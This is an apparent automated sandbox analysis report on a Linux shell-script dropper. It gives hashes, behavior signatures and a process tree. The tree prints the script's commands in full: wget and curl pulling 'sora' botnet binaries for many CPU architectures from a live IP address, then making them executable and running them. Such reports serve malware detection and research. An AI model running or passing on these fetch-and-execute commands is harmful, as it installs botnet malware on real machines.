Analysis
-
max time kernel
2s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 02:04
Static task
static1
Behavioral task
behavioral1
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
-
Size
2KB
-
MD5
5d873bf46fd4ff411eb17e42d5ae2980
-
SHA1
fd73b1bb3b7241d68fcaac4f4bf9cc6164b6fa06
-
SHA256
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d
-
SHA512
f58f94eaa5f9440db6b1c41915be89331d7355904631d3ede46adfd517e493b3e49979d0ad0a535d8d6181ac81e0d19d6ba0dcb33765b54bbc16830828cc6382
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1559 chmod 1571 chmod 1511 chmod 1523 chmod 1529 chmod 1541 chmod 1565 chmod 1505 chmod 1517 chmod 1489 chmod 1535 chmod 1553 chmod 1495 chmod 1547 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 1490 robben /tmp/robben 1496 robben /tmp/robben 1506 robben /tmp/robben 1512 robben /tmp/robben 1518 robben /tmp/robben 1524 robben /tmp/robben 1530 robben /tmp/robben 1536 robben /tmp/robben 1542 robben /tmp/robben 1548 robben /tmp/robben 1554 robben /tmp/robben 1560 robben /tmp/robben 1566 robben /tmp/robben 1572 robben -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1494 cat 1492 wget 1493 curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Processes
-
/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh1⤵
- Writes file to tmp directory
PID:1485 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:1486
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵PID:1487
-
-
/bin/catcat sora.x862⤵PID:1488
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1489
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1490
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1492
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1493
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:1494
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1495
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1496
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:1498
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵PID:1503
-
-
/bin/catcat sora.x86_642⤵PID:1504
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1505
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1506
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:1508
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵PID:1509
-
-
/bin/catcat sora.i4682⤵PID:1510
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1511
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1512
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:1514
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵PID:1515
-
-
/bin/catcat sora.i6862⤵PID:1516
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1517
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1518
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:1520
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵PID:1521
-
-
/bin/catcat sora.mpsl2⤵PID:1522
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1524
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:1526
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵PID:1527
-
-
/bin/catcat sora.arm42⤵PID:1528
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1530
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:1532
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵PID:1533
-
-
/bin/catcat sora.arm52⤵PID:1534
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1536
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:1538
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵PID:1539
-
-
/bin/catcat sora.arm62⤵PID:1540
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1542
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:1544
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵PID:1545
-
-
/bin/catcat sora.arm72⤵PID:1546
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1548
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵PID:1551
-
-
/bin/catcat sora.ppc2⤵PID:1552
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1554
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1556
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1557
-
-
/bin/catcat sora.ppc440fp2⤵PID:1558
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1560
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵PID:1563
-
-
/bin/catcat sora.m68k2⤵PID:1564
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1566
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:1568
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵PID:1569
-
-
/bin/catcat sora.sh42⤵PID:1570
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii12⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1572
-